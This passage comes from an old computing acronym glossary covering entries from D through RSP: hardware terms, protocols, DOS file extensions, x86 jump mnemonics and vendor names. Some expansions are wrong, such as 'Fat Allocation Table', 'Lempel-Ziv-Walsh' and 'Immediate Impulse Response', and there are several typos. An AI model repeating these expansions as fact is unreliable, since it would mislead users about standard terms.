Sheet + Digital Data Storage +DEC Decrement + Device Clear + + Digital Equipment Corporation +.DEF Definitions + Defaults (file name extensions) +DEL Delete +.DEM Demonstration (file name extension) +DES Data Encryption Standard + Data Entry Sheet +.DES Description (file name extension) +DET Device Execute Trigger +DEV Device +DF Data Field + Destination Field + Device Flag + + Double Flag +DFC Data Flow Control +DFS Distributed File System +DFT Diagnostic Funtion Test + Discrete Fourier Transform + + Distributed Function Terminal +DFU Data File Utility +DGIS Direct Graphics Interface Standard +DI Data In + Destination Index +DIA Document Interchange Architecture [IBM] +DIBOL DEC Business Oriented Language +.DIC Dictionary (file name extension) +DID Direct Inward Dialing +DIF Data Interchange Format +DIFFSENS Differential Sense +DIIP Direct Interrupt Identification Port +DIN Deutsche Industrie Norm (German equivalent of EIA) +DIO Data Input-Output +DIP Dual In-line Package +DIR Directory (file) +DIS Dynamic Impedance Stabilization [CompuCom] +DISP Displacement (offset) +DIV Divide +DIW D-Inside Wire [AT&T] +DL Download +DL/1 Data Manipulation Language 1 [IBM] +DLC Data Link Control (protocol) [IBM] +DLE Data Link Escape +DLL Dynamic Link Library +DLR DOS LAN Requester +DMA Direct Memory Access +DMAC DMA Controller +DME Distributed Management Environment +DML Data Manipulation Language +DMM Digital Multimeter +DMMS Dynamic Memory Management System +DMOS Double-diffused Metal-Oxide Semiconductor +DMP Dot Matrix Printer +DMS Data Management Software + Data Management System +DMY Day Month Year +DN Down +DNC Direct Numerical Control +DNIS Dialed Number Identification Service +DNS Domain Naming System +DO Data Out +.DOC Document + Documentation (file name extensions) +DOS Disk Operating System +DOW Day Of Week +DP Data Processing +DPA Demand Protocol Architecture [3Com] +DPAREN Data Parity Enable [IBM] +DPB Drive Parameter Block +DPC Direct Program Control +DPI Dots Per Inch +DPL Descriptor Privilege Level +DPM Digital Panel Meter +DPMA Data Processing Management Association +DPMI DOS Protected Mode Interface [Microsoft] +DR Data Received +D/R Direct or Reverse +DRAM Dynamic Random Access Memory +DRAW Direct Read After Write +DRDA Distributed Relational Data Architecture [IBM] +DRDW Direct Read During Write +DRI Digital Research Incorporated +DRO Data Request Output + Destructive Read-Out +.DRS WordPerfect Driver Resource (file name extension) +DRV Drive +.DRV Device Driver (file name extension) (Also see .DVR) +.DRW Draw + Drawing (file name extensions) +DS Data Segment + Data Send + Data Server + Double Sided +DSDD Double Sided, Double Density (diskette) +DSE Data Storage Equipment +DSEA Display Station Emulation Adapter +DSECT Dummy Control Section +DSHD Double Sided, High Density (diskette) +DSL Dynamic Simulation Language +DSP Digital Signal Processing + + Digital Signal Processor +DSQD Double Sided, Quad Density (diskette) +DSR Data Set Ready + Device Status Register + + Device Status Report +DSS Decision Support System +DSTN Double Supertwisted Nematic +DSW Data Status Word + Device Status Word +D2T2 Dye Diffusion Thermal Transfer (printing) +DTA Disk Transfer Area +.DTA Data (file name extension) +DTE Data Terminal Equipment + Dumb Terminal Emulator +DTL Diode-Transistor Logic +DTMF Dual Tone Multifrequency +DTP Desktop Publishing +DTR Data Terminal Ready + Data Transfer Rate +DU Disk Usage +.DV DESQview Script (file name extension) +DVI Digital Video Interactive +.DVR Device Driver (file name extension) (Also see .DRV) +DWG Drawing +.DXB Drawing Interchange Binary (file name extension) + [AutoCAD] +DXC Data Exchange Control +DXF Drawing Interchange Format +EA Extended Attribute [OS/2] +EAROM Electrically Alterable Read Only Memory +EARS Electronic Access to Reference Services +EATA Enhanced AT Bus Attachment +EBC EISA Bus Controller +EBCDIC Extended Binary Coded Decimal Interchange Code [IBM] +EBI Equivalent Background Input + + Extended Background Investigation +EBT Electronic Benefits Transfer +ECAL Enjoy Computing And Learn +ECC Error Check Code + Error Checking and Correction + + Error Correction Code +ECD Enhanced Color Display +ECL Emitter Coupled Logic +ECMA European Computer Manufacturers Association +ED Erase Display +EDA Embedded Document Architecture [Go Corporation] +EDC Error Detection and Correction +EDDC Extended Distance Data Cable +EDI Electronic Data Interchange + + Electronic Document Interchange [DEC] +EDIFACT EDI for Administration Commerce and Transport +EDLC Ethernet Data Link Control +EDLIN Editor (Line Text) +EDP Electronic Data Processing +EDPM Electronic Data Processing Machine +EDSAC * Electronic Delay Storage Automatic Computer +EDSI Enhanced Small Device Interface +EDVAC * Electronic Discrete Variable Automatic Computer + (First stored-program digital computer) +EEC Extended Error Correction +EEG Electroencephalogram +EEM Extended Memory Management +EEMS Enhanced Expanded Memory Specification +EEPROM Electrically Erasable Programmable Read-Only Memory +EFA Extended File Attribute +EFI Electromechanical Frequency Interference + + Electronics For Imaging +EFL Emitter Follower Logic +EFTS Electronic Funds Transfer System +EGA Enhanced Graphics Adapter +EIA Electronic Industries Association +EIS Executive Information System +EISA Extended Industry Standard Architecture +EL Electroluminescent (display) + Erase Line +ELF Extremely Low Frequency +ELS Entry Level System +EM Electronic Mail + Expanded Memory +EMA Enterprise Management Architecture +E-MAIL Electronic Mail +EMB Extended Memory Blocks [LIM/AST] +EMC Electromagnetic Compatibility + Extended Math Coprocessor +EMI Electromagnetic Interference +.EML Electronic Mail (file name extension) +EMM Expanded Memory Manager +EMR Electro-Magnetic Radiation +EMS Electronic Mail System + Electronic Message Service + + Expanded Memory Specification [LIM] +.ENC Encoded (file name extension) +ENDS Ends Segment +ENIAC * Electronic Numerical Integrator and Computer + (First fully electronic digital computer) +ENQ Enquiry +EOA End of Address +EOB End of Block +EOC End of Conversion +EOF End of File +EOI End or Identify +EOJ End of Job +EOL End of Line + End of List +EOM End of Message +EOR Exclusive OR (Also XOR) +EOS End of String +EOT End Of Table + End of Tape (marker) + End of Text + + End of Transmission +EPL Effective Privilege Level +EPLD Electrically Programmable Logic Device +EPROM Electrically Programmable Read Only Memory + + Erasable Programmable Read Only Memory +.EPS Encapsulated PostScript (file name extension) +EPSF Encapsulated PostScript Files +ERLL Enhanced Run Length Limited +EROM Erasable Read Only Memory +ERR Error +ES Extra Segment +ESA European Space Agency +ESC Escape +ESD Electrostatic Discharge +ESDI Enhanced Small Device Interface +ESI Enhanced Serial Interface (specification) [Hayes] +ESP Enhanced Serial Port [Hayes] +ESS Electronic Switching System +ESU Electro-Static Unit +ETB End of Transmission Block +ETPL Endorsed Tempest Products List +ETS Econometric Time Series +ETX End of Text +EVGA Extended Video Graphics Array + + Extended Video Graphics Adapter +.EXE Executable (file name extension) +EXE2BIN Program used to convert an (.EXE) file to binary + format (.COM) file +EXP Exponent +EXT External +EXTRN External Reference +FAB Computer-Chip Fabrication Plant +FAMOS Floating Gate Avalanche MOS +FAP File Access Protocol +FAT Fat Allocation Table +FAX Facsimile +.FAX Fax (file name extension) +FCB File Control Block +FCC Federal Communications Commission +FCI Flux Changes per Inch +FD Floppy Disk + Full Duplex +FDC Floppy Disk Controller +FDDI Fiber Digital Device Interface + + Fiber Distributed Data Interface +FDISK Fixed Disk +FEFO First-Ended, First-Out +FEP Front End Processor +FET Field Effect Transistor +FF Flip-Flop + Form Feed +FFT Fast Fourier Transform +FIFO First-In, First-Out +FILO First-In, Last-Out +FIP File Processor Buffering +FIR Finite Impulse Response +FLD Field +FLOPS Floating Point Operations Per Second +FMS Forms Management System +FMT Format +FNT Font +FOCUS Forum of Control Data Users +FOG First Osborne Group +.FON Phone + Phone Directory (file name extensions) +.FOR FORTRAN source code (file name extension) +FORTH (Programming Language)(See HLL) +FORTRAN Formula Translator (Programming Language)(See HLL) +FOSE Federal Office Systems Exposition +FOSSIL Fido/Opus/Seadog Standard Interface Layer +FPGA Field Programmable Gate-Array +FPLA Field Programmable Logic-Array +FPP Fixed Path Protocol + Floating Point Processor +FPS Frames Per Second +FPU Floating Point Processor Unit +FRAG Fragment + Fragmentation +FRAM Ferroelectric Random-Access Memory +FRED Frame Editor +FRPI Flux Reversals Per Inch +.FRS WordPerfect Graphics Driver (file name extension) +FSD File System Driver [OS/2] +FSK Frequency Shift Keying +F/T Full Time +FTAM File Transfer, Access and Management +FTP File Transfer Protocol +FTS Federal Telecommunication System +FUNC Function +GAAP Generally Accepted Accounting Principles +GAL Generic Array Logic +GB Gigabyte (1,000 megabytes) +GCR Group Code Recording +GDA Global Data Area +GDDM Graphics Data Display Manager +GDI Graphics Device Interface +GDT Geometric Dimensioning and Tolerancing + + Global Descriptor Table +GEM Graphics Environment Manager (DRI Program) +GEOS Graphic Environment Operating System [Geoworks] +GET Get Execute Trigger +GHZ Gigahertz +.GIF Graphic Interchange Format (file name extension) +GIGO Garbage In, Garbage Out +GIS Geographical Information System +GKS Graphical Kernal System +G/L General Ledger +GLM General Linear Models +.GLY Glossary (file name extension) [Microsoft Word] +GMT Greenwich Mean Time +GND System Ground +GOSIP Government Open Systems Interconnection Profile +GP Gas Plasma + General Purpose +GPI Graphics Programming Interface +GPIB General Purpose Interface Bus +GPSS * General Purpose Simulation Language +GRE Graphics Engine +.GRF Graph (file name extension) +.GRP Group (file name extension) +GUI Graphical User Interface +GW-BASIC Gee Whiz BASIC +.H Header (file name extension) [C] +HAL Hard Array Logic + House Programmed Array Logic +HASP Houston Automatic Spooling Priority (System) +HD Hard Disk + High Density +HDA Head Disk Assembly +HDI Head to Disk Interference +HDLC High-Level Data Link Control +HDR Header +HDSC High Density Signal Carrier [DEC] +HDTV High Definition Television +HDW Hardware +HERC Hercules +HEX Hexadecimal +HGA Hercules Graphics Adapter +HGCP Hercules Graphics Card Plus +HH Hour +HIL Human Interface Link [HP] +HLCO High Low Close Open +HLL High Level Language +HLLAPI High Level Language Application Programming Interface +.HLP Help (file name extension) +HLQ High Level Qualifier +HLT Halt +HMA High Memory Area [Microsoft] +HMOS High Density Metal Oxide Semiconductor + + High Speed Metal Oxide Semiconductor +HP Hewlett-Packard (Company) +HPFS High-Performance File System +HPG Hewlett-Packard Graphics +HPGL Hewlett-Packard Graphics Language +HPIB Hewlett-Packard Interface Bus +HPPA Hewlett-Packard Precision Architecture +HPPI High Performance Parallel Interface +HRIS Human Resource Information System +HRG High Resolution Graphics +HRMS Human Resource Management System +HS High Speed +HSC High Speed Channel +HSP High Speed Printer +HST High Speed Technology [U.S. Robotics] +.HST History + Host (file name extensions) +HSV Hue Saturation Value +HUT Hopkins Ultraviolet Telescope +H/V Horizontal/Vertical +HVP Horizontal & Vertical Position +H/W Hardware +HWCP Hardware Code Page +HWD Height-Width-Depth +.HYP Hyphenation (file name extension) +HZ Hertz +IAL * International Algebraic Language + (ALGOL was first called IAL) +IBC Instrument Bus Computer +IBM International Business Machines (Corporation) +IBM-GL IBM Graphics Language +IC Input Circuit + Integrated Circuit + Interrupt Controller +ICA Intra-application Communications Area +ICAS Intel Communicating Applications Specifications +ICCP Institute for the Certification of Computer Professionals +ICE In-Circuit Emulator [Intel] +ICL Interface Clear +ICMP Internet Control Message Protocol [Novell] +.ICO Icon (file name extension) +ICP Integrated Channel Processor +ICR Intelligent Character Recognition +ID Identification + Identifier +IDA Integrated Digital Access + Intelligent Disk Array + + Intelligent Drive Array +IDE Imbedded Drive Electronics + + Integrated Development Environment [Borlund] + + Integrated Drive Electronics + + Intelligent Drive Electronics + + Interactive Design and Engineering + + Interface Design Enhancement +IDIV Integer Divide +IDMS Integrated Data Base Management System +IDP Integrated Data Processing +IDT Interrupt Descriptor Table +.IDX Index (file name extension) +IEEE Institute of Electrical and Electronics Engineers +I/F Interface +IFD Image File Directory +IFS Installable File System [OS/2] +IGA Integrated Graphics Array +IGC Integrated Graphics Controller +IIF Immediate IF +IIR Immediate Impulse Response +IMDS Image Data Stream (format) [IBM] +IMG Image +IMP Interface Message Processor +IMS Information Management System + + Intermediate Maintenance Standards +IMUL Integer Multiply +IN Input +INC Increment +.INF Information (file name extension) +.INI Initialize (file name extension) +INIT Initialize +INS Input String +INT Integer + Internal + Interrupt +INTA Interrupt Acknowledge +INTO Interrupt if Overflow occurs +I/O Input/Output +IOCS Input/Output Control System +IOCTL Input/Output Control +IOSGA Input/Output Support Gate Array +IP Instruction Pointer + Internet Protocol +IPC Instructions Per Clock + Interprocess Communication +IPF Information Presentation Facility +IPL Initial Program Load + Initial Program Loader +IPL * Information Programming Language +IPSE Integrated Project Support Environment +IPX Internetwork Packet Exchange [Novell] +IQL Interactive Query Language +IRET Interrupt Return +IRL Interactive Reader Language + Inter-Repeater Link +IRLED Infrared Light Emitting Diode +IRM Information Resource Management +IRQ Interrupt Request +IRX Information Retrieval Experiment +IS Interrupt Status +ISA Industry Standard Architecture +ISAM Indexed Sequential-Access Method +ISC Instruction Set Computer +ISD Image Section Descriptor + + Instructional Systems Design +ISDN Integrated Services Digital Network +ISI Internally Specified Index +ISL Interactive System Language +ISO International Standards Organization +ISP Interrupt Status Port +ISPF Interactive System Programming Facility +ISR Information Storage and Retrieval + + Interrupt Service Routines +ITB Information Technology Branch + Intermediate Text Block +ITC International Typeface Corporation +ITU International Telecommunication Union +ITX Intermediate Text Block +IVIS Interactive Video Information System +IVR Interactive Voice Response +IVS Interactive Videodisk System +IVT Interrupt Vector Table +IV&V Independent Verification & Validation +JA Jump Address + Jump if Above +JAE Jump if Above or Equal +JBE Jump if Below or Equal +JC Jump if Carry set +JCL Job Control Language +JE Jump if Equal +JEDEC Joint Electronic Devices Engineering Council +JEIDA Japanese Electronics Industry Development Association +JES Job Entry System +JG Jump if Greater +JGE Jump if Greater or Equal +JL Jump if Less +JLE Jump if Less than or Equal to +JMP Jump +JNA Jump if Not Above +JNAE Jump if Not Above or Equal +JNB Jump if Not Below +JNBE Jump if Not Below or Equal +JNG Jump if Not Greater +JNGE Jump if Not Greater or Equal +.JNK Junk (file name extension) +JNLE Jump if Not Less or Equal +JNO Jump if No Overflow +JNP Jump if No Parity +JNS Jump if No Sign +JPE Jump if Parity Even +JPEG Joint Photographic Experts Group +JPL Jet Propulsion Laboratory +JPO Jump if Parity Odd +JS Jump if Sign +JZ Jump if Zero +JNZ Jump if Not Zero +KB Keyboard + Kilobyte (1,024 bytes) +KBD Keyboard (also KEYB) +KBPS Kilo-Bytes Per Second +KDT Key Definition Table +KEYBBE Foreign language KEYBoard program - Belgium +KEYBCF Foreign language KEYBoard program - Canadian-French +KEYBDF Foreign language KEYBoard program - Denmark +KEYBFR Foreign language KEYBoard program - France +KEYBGR Foreign language KEYBoard program - Germany +KEYBLA Foreign language KEYBoard program - Latin America +KEYBNL Foreign language KEYBoard program - Netherlands +KEYBNO Foreign language KEYBoard program - Norway +KEYBPO Foreign language KEYBoard program - Portugal +KEYBSF Foreign language KEYBoard program - Swiss-French +KEYBSG Foreign language KEYBoard program - Swiss-German +KEYBSP Foreign language KEYBoard program - Spain +KEYBSU Foreign language KEYBoard program - Finland +KEYBSV Foreign language KEYBoard program - Sweden +KEYBUK Foreign language KEYBoard program - United Kingdom +KSR Keyboard Send Receive +KRS Knowledge Retrieval System +LALL Longest Allowed Lobe Length +LAN Local Area Network +LAPB Link Access Procedure Balanced (protocol) +LAPD Link Access Procedure Direct (protocol) +LAPM Link Access Procedure for Modems +LAR Load Access Rights +LAWN Local Area Wireless Network +LBL Label +LBR Librarian +.LBR Library (file name extension) +LBT Listen Before Talk +LCC Leadless Chip Carrier +LCD Liquid Crystal Display +LCU Last Cluster Used +LDA Logical Device Address +LDC Lotus Development Corporation +LDT Local Descriptor Table +LE Less or Equal +LEA Load Effective Address +LED Light Emitting Diode +LEM Language Extension Module +.LET Letter (file name extension) +LEX Lexicon +LF Line Feed +LFI Last File Indicator +LFU Least Frequently Used +LGDT Load Global Descriptor Table +.LIB Library (file name extension) +LICS Lotus International Character Set [LDC] +LIDT Load Interrupt Descriptor Table +LIFO Last In First Out +LIM Lotus/Intel/Microsoft +LIMS Library Information Management System +LIPS Logical Interferences Per Second +LISP List Processing (Language)(See HLL) +LLC Logical Link Control +LLDT Load Local Descriptor Table +LMI Local Management Interface +LMSW Load Machine Status Word +LM/X LAN Manager for Unix +LN Logarithm (Natural) +LOC Loop On-Line Control +LODSB Load String Byte +LOG Logarithm (Base 10) +LOGO (Programming Language)(See HLL) +LOOPE Loop while Equal +LOOPNE Loop while Not Equal +LOOPNZ Loop while Not Zero +LOOPZ Loop while Zero +LORE Line Oriented Editor +LPD Line Printer Daemon (protocol) [Berkley] +LPI Lines Per Inch +LPL Lotus Programming Language [Lotus 1-2-3] [LDC] +LPM Lines Per Minute +LPN Logical Page Number +LPT Line Printer +LPT1 First Parallel Printer Port +LPT2 Second Parallel Printer Port +LPT3 Third Parallel Printer Port +LQ Letter Quality +LRC Local Register Cache + + Longitudinal Redundancy Check +LRI Least Recently Loaded +.LRS Language Resource (file name extension) [WordPerfect] +LRU Least Recently Used +LSA Line Sharing Adapter +LSB Least Significant Bit +LSC Least Significant Character +LSD Least Significant Digit +LSI Large Scale Integration +LSL Load Segment Limit +LST List +.LST List (file name extension) +LTR Letter + Load Task Register +LU Logical Unit (Also LUN) +LUT Lookup Table +LZW Lempel-Ziv-Walsh (algorithm) +MAC Medium Access Control +.MAC MacPaint (file name extension) + + Macro (file name extension) +.MAI Mail (file name extension) +MAN Manual + Metropolitan Area Network +MAP Maintenance Analysis Procedures + + Manufacturing Automation Protocol + + Memory Allocation Map +.MAP Linker Map (file name extension) +MAPICS Manufacturing, Accounting and Production + Information Control System [IBM] +MASM Macro Assembler [Microsoft] +MAU Media Access Unit + Multistation Access Unit +MAX Maximum +MB Megabyte (1,000 kilobytes) +MBASIC Microsoft BASIC +MBPS Megabytes Per Second +MCA Micro Channel Architecture [IBM] +MCB Memory Control Block +MCGA Multicolor Graphics Array +MCU Multi-Chip Unit [DEC] +MD Make Directory + Monochrome Display +MDA Monochrome Display Adapter +MDI Multiple Document Interface +MDIC Manchester Decoder and Interface Chip [AT&T] +MDR Minimum Design Requirement +MDY Month Day Year +.ME Opening Information (file name extension) (As in READ.ME) +MEB Memory Expansion Board +MEG Megabyte +.MEN Menu (file name extension) +MFLOPS Million Floating Point Operations Per Second +MFM Modified Frequency Modulation +MFP Multifunction Peripheral +MFS Magnetic Tape Field Search +MFT Multiprogramming with a Fixed number of Tasks +MGA Monochrome Graphics Adapter +MGR Manager +MHS Message Handling Service + Message Handling System +MHZ Megahertz +MICS Macro Interpretive Commands +MIDI Musical Instrument Digital Interface +MII Microsoft/IBM/Intel +MIL Machine Interface Layer [Go Corporation] +MIMD Multiple Instruction Multiple Data Stream (processor) +MIN Minimum +MIPS Million Instructions Per Second +MIS Management Information System +MISC Miscellaneous +MIX Member Information Exchange +MKDIR Make Directory +ML Machine Language +MM Minutes + Month +MMC Matched Memory Cycle + Microcomputer Marketing Council +MMU Memory Management Unit +MNOS Metal Nitride Oxide Semiconductor +MNP Microcom Networking Protocol +.MNU Menu (fine name extension) +MO Magneto-Optical (disk drive) +MODEM Modulator Demodulator +MOHLL Machine Oriented High Level Language +MOV Metal Oxide Varistor + Move +MOVS Move String +MOD Modem + Modulus +MOS Metal Oxide Semiconductor +MOSFET Metal Oxide Semiconductor Field Effect Transistor +MOV Move +MOVS Move String +MPC Multimedia Personal Computer +MPCS Mission Planning and Control Station (Software) +MPEG Moving Picture Experts Group +MPP Massively Parallel Processing + + Message Processing Program + + Microcom Network Protocol [Microcom] +MPR Multipart Repeater +MPT Mean Repair Time +MPU Microprocessor Unit +MR Modem Ready +MRI Magnetic Resonance Imaging +MRO Multi-Region Operation +MRP Materials Requirement Planning +MRPL Main Ring Path Length +MS Memory System + Microsecond + + Microsoft Corporation + Millisecond +MSB Most Significant Bit +MSD Mass Storage Device + Most Significant Digit +MS-DOS Microsoft-Disk Operating System +MSDR Multiplexed Streaming Data Request +MSG Message +.MSG Program Message (file name extension) +MSI Medium Scale Integration +MSL Map Specification Library +.MSP Microsoft Paint (file name extension) [Microsoft] +MSW Machine Status Word +MTA Message Transfer Agent + Multiple Terminal Access +MTBB Mean Time Between Breakdowns +MTBF Mean Time Before Failure + Mean Time Between Failures +MTBJ Mean Time Between Jams +MTS Message Transfer Service + Multichannel Television Sound +MTTF Mean Time To Failure +MTTR Mean Time To Repair +MUL Multiply +MUMPS Massachusetts General Hospital Utility + Multi-Programming System (Programming Language) +MUX Multiplexer +MVGA Monochrome Video Graphics Array +MVS Multiple Virtual Storage +MVT Multiprogramming with a Variable number of Tasks +NACD National Association of Computer Dealers +NACS National Advisory Committee on Semiconductors +NAE Not Above or Equal +NAK Negative Acknowledgment +NAPLPS North American Presentation Level Protocol + Syntax (graphics) +NAS Network Application Support [DEC] +NASA National Aeronautics and Space Administration +NASI NetWare Asynchronous Services Interface [Novell] +NBE Not Below or Equal +NBI Nothing But Initials +NBS National Bureau of Standards +NC No Carry + Numerical Control +NCA Network Communications Adapter +NCC Network Control Center +NCGA National Computer Graphics Association +NCIC National Crime Information Center +NCMT * Numerical Control for Machine Tools +NCP Network Control Processor + Network Control Program + + Not Copy Protected +NCR National Cash Register (Company) +NCSI Network Communications Services Interface [Novell] +NDEF Not to be Defined +NDIS Network Driver Interface Specification +NDP Numeric Data Processor +NDRO Non-Destructive Read Out +.NDX Index (file name extension) +NEC Nippon Electric Company +NEG Negative + Negate +NetBIOS Network Basic Input/Output System [IBM] +NetBEUI NetBIOS Extended User Interface [IBM] +.NEW New Information (file name extension) +NEWS NetWare Early Warning System [Frye Computer] +NFF No Fault Found +NFS Network File System +NG No Good +NGE Not Greater or Equal +NHC National Hurricane Center +NIC Network Interface Card + Numeric Intensive Computing +NICAD Nickel Cadmium +NID New Interactive Display [NEC] + Next ID +NIPS Network I/Os Per Second +NIST National Institute for Standards and Technology +NJE Network Job Entry (protocol) [IBM] +NL New Line +NLE Not Less or Equal +NLM NetWare Loadable Module +NLQ Near Letter Quality +NMI Non-Maskable Interrupt +NMOS Negative Channel Metal-Oxide Semiconductor +NOP No Operation +NOR Not Or +NOS Network Operating System +NPI Network Printer Interface +NRZ Not Return to Zero +NRZI Non Return to Zero Inverted +NS Nanosecond + Network Supervisor + Non Stop +NSA POLY National Security Agency Polygraph +NSF National Science Foundation +NT New Technology [Microsoft] +NTF No Trouble Found +NTSC National Television Standards Committee +NUI Network User Identification + + Network User Interface + + Notebook User Interface [Go Corporation] +NUL Dummy Device + No Device +NV No Overflow +NVM Non-Volatile Memory +NVRAM Non-Volatile Random Access Memory +OAG Official Airline Guide +OAI Open Applications Interface +OBJ Object +OCL Operation Control Language + Operator Control Language +OCR Optical Character Recognition +ODA Office Document Architecture +ODBMS Object-Oriented Database Management System +ODI Open Datalink Interface [Novell] +OEM Original Equipment Manufacturer +OF Overflow Flag +OFMT Output Format for Numbers +OFS Output Field Separator +OH Off Hook +OIS Office Information Systems +.OLD Old version (file name extension) +OLE Object Linking and Embedding [Microsoft] +OLMC Output Logic Macrocell +OLTP On-Line Transaction Processing +OMF Object Module Format [Microsoft] +OMG Object Management Group +OMNS Open Network Management System +OMR Optical Mark Recognition +OOL Object-Oriented Language +OOPL Object-Oriented Programming Language +OOPS Object Oriented Programming and Systems +OOS Object-Oriented Systems + + Off-line Operating Simulator +OP Operation + Optical + Output +OPC Optical Photoconductor +OP CODE Operational Code +OPD Operand +OPM Operations Per Minute +OPS Operations +.OPT Options (file name extension) +OPUS Octal Program Updating System +ORACLE On-Line Inquiry and Report Generator (UNIX DB program) +ORS Output Record Separator +OS Operating System +OS/2 Operating System Two [IBM] +OSA Open System Architecture +OS/E Operating System/Environment +OSF Open Software Foundation +OSI Open Systems Interconnection +OTF Open Token Foundation +.OUT Outlines (fine name extension) +OUTS Output String +OV Overflow +.OVL Program Overlay (file name extension) +.OVR Program Overlay (file name extension) +PABX Private Automatic Branch Exchange +PAD Packet Assembler/Disassembler +PADS Pen Application Development System [Slate Corporation] +PAL Paradox Applications Language [Borlund] + + Phase Alternate Line + Programmed Array Logic + + Programming Assembly Language +PALS Principles of the Alphabet Literacy System +PAR Parallel +PARA Paragraph +PARC Palo Alto Research Center [XEROX] +.PAS PASCAL source code (file name extension) +PASCAL (Programming Language named for Blaise Pascal) +.PAT Patch (file name extension) +PBE Prompt By Example +PBX Private Branch Exchange +PC Personal Computer + Printed Circuit + Program Counter +PCB Printed Circuit Board + Program Control Block +PC-DOS Personal Computer - Disk Operating System + (IBM version of MSDOS) +PC-I/O Program Controlled I/O +PCL Printer Command Language [HP] + Process Control Language +PCM Pulse Code Modulation +PCMCIA Personal Computer Memory Card International Association +PCS Patchable Control Store + Planning Control Sheet + + Print Contrast Signal + Process Control Systems + + Program Counter Store + Project Control System +.PCT Picture (file name extension) +.PCX Picture Image (file name extension) +PD Public Domain +PDF Program Development Facility +.PDF Printer Description (file name extension)[Borlund,Lotus] +PDL Page Description Language + Program Description Language + + Program Design Language +PDN Public Data Network +PDP Progammable Data Processor + + (DEC Computer System Designation, i.e. PDP-8, PDP-11) +PDS Partitioned Data Set +PDSS Post Development and Software Support +.PDX Paradox files (file name extension) [Borlund] +PE Parity Even + Protect Enable +PEA Pocket Ethernet Adapter +PEL Picture Element [IBM] +PEP Packetized Ensemble Protocol [Telebit] +PERT Program Evaluation and Review Technique +PES Positioning Error Signal +PFR Power-Fail Restart +PGA Pin Grid Array + Professional Graphics Adapter [IBM] +PGDN Page Down +.PGL Graphics (file name extension) [Hewlett-Packard] +PGM Program +.PGP ProGram Parameter (file name extension) [AutoCAD] +PGUP Page Up +PHIGS Programmers' Hierarchial Interactive Graphics + Standards +.PHO Phone List (file name extension) +PI Program Interruption +PIA Peripheral Interface Adapter +PIC Priority Interrupt Controller + + Program Interrupt Controller +.PIC Graph (file name extension) [Lotus 1-2-3] [LDC] +PID Process Identification Number +PIF Program Information File +PILOT Programmed Inquiry Learning Or Teaching +PIM Personal Information Manager +PIN Personal Identification Number +PIO Parallel Input/Output + Processor Input/Output + + Programmed Input/Output +PIP Picture In Picture + Programmable Interconnect Point +PIPO Parallel In, Parallel Out +PIT Programmable Interval Timer +PIXEL Picture Element +PL Plus +PLA Programmable Logic-Array +PLATO Programmed Logic for Automatic Teaching Operations +PLC Programmable Logic Controller +PLCC Plastic Leadless Chip Carrier +PLD Programmable Logic Device +PLL Phase Locked Loop +.PLL Prelinked Library (file name extension) [Clipper] +PL/M Programming Language for Micros +PLV Production Level Video +PL/1 * Programming Language One +PM Presentation Manager + Preventative Maintenance +PMMU Paged Memory Management Unit +PMOS Positive Channel Metal Oxide Semiconductor +PO Parity Odd +POL Problem Oriented Language +POP Pop from Stack +POPA Pop All Registers +POPF Pop Flags +POS Point Of Sale + Positive + Programmable Object Select +POSIX Portable Oprating System Environment Standard [IEEE] +POST Power-On Self Test +POSTNET Postal Numeric Encoding Technique +PPDS Personal Printer Data Stream [IBM] +PPM Pages Per Minute +.PRD Printer Driver (file name extension) [Word] +.PRF Preferences (file name extension) [Grammatik IV] +PROC Procedure +PROG Program + Programmer +PROLOG Programming In Logic (Programming Language)(See HLL) +PROM Programmable Read Only Memory +PRN Printer +PPP Point-to-Point Protocol +.PRS Printer (file name extension) [WordPerfect] +PRTSC Print Screen +.PS PostScript (file name extension) +PS/2 Programming System 2 [IBM] +PSC Product Service Center +PSP Program Segment Prefix +P-SRAM Pseudo-Static Random Access Memory +PSW Program Status Word +PT Page Table +P/T Part Time +PTD Parallel Transfer Disk Drive +PUB Publication + Publish +.PUB Publication (file name extension) [Ventura] +PUSHA Push All Registers +PUSHF Push Flags +PVM Pass-through Virtual Machine (protocol) [IBM] +PWB Printed Wire Board +PWR Power +.PX Primary Index (file name extension) [Paradox] +QA Quality Assurance +QAM Quadrature Amplitude Modulation +QBE Query By Example +QBF Query by Form +QC Quality Control +QDOS Quick and Dirty Operating System +.QDI Dictionary (file name extension) [Quicken] +.QDT Data (file name extension) [Quicken] +QFA Quick File Access +QIC Quality Information Using Cycle Time [Hewlett-Packard] + + Quarter-Inch Cartridge +.QIF Quicken Interchange Format (file name extension) +[Quicken] +.QMT Memorized List (file name extension) [Quicken] +.QNX Indexes to Data (file name extension) [Quicken] +QPSK Quadrature Phase Shift Keying +RA Return Authorization +RACF Resource Access Control Facility +RAG Row Address Generator +RAID Redundant Arrays of Inexpensive Disks +RALU Register Arithmetic Logic Unit +RAM Random Access Memory +RAMDAC Random Access Memory Digital-to-Analog + Converter [Sierra] +RAND Random +RAS Random Access Storage + + Reliability, Availability and Serviceability + + Row Address Select +RBBS Remote Bulletin Board System +RCL Rotate Carry Left +RCP Restore Cursor Position +RCR Rotate Carry Right +RCS Records Communications Switching System +RD Receive Data +R&D Research and Development +RDB Receive Data Buffer +RDCLK Received Timing Clock +RDSR Receiver Data Service Request +.REF Reference (file name extension) +REG Register +REGAL Rigid Epoxy Glass Acrylic Laminate +REM Remark + Remote + Ring Error Monitor +REN Rename +REP Repeat +REPE Repeat while Equal +REPNE Repeat while Not Equal +REPNZ Repeat while Not Zero +REPZ Repeat while Zero +REQ Request +RES Reset + Resolution +.RES Resource (file name extension) +RET Resolution Enhancement Technology [HP] + + Return +REX Relocatable Executable +RD Received Data + Remove Directory +RDB Relational Data Base +RDBMS Relational Data Base Management System +RELSECT Relative Sector +RF Radio Frequency +RFP Request for Proposal +RFS Remote File System +RFT Revisable Form Text + Rich Text Format +RFU Reserved For Future Use +RGB Red-Green-Blue (color model) +RIFF Resource Interschange File Format [Microsoft] +RIME RelayNet International Message Exchange +RIP Raster Image Processor + + Routing Information Protocol [Novell] +RISC Reduced Instruction Set Computer +RLE Run Length Encoded +RLL Run Length Limited +RLSD Received Line Signal Detected +RLSI * Ridiculously Large-Scale Integration +RM Reset Mode +RMA Return Material Authorization + + Return to Manufacturer Authorization +RMDIR Remove Directory +RMS Record Management Services + Root Mean Square +RND Random +R-O Read Only +ROL Rotate Left +ROM Read Only Memory +ROR Rotate Right +RPC Real Procedure Call + Remote Procedure Call +RPG Report Program Generator (Programming Language) +RPL Requested Privilege Level +RPPROM Reprogrammable PROM +RPT Repeat +RPQ Request for Price Quotation +RS Radio Shack + Request to Send + + Recommended Standard (as in RS-232) [EIA] +RSP Required Space Character 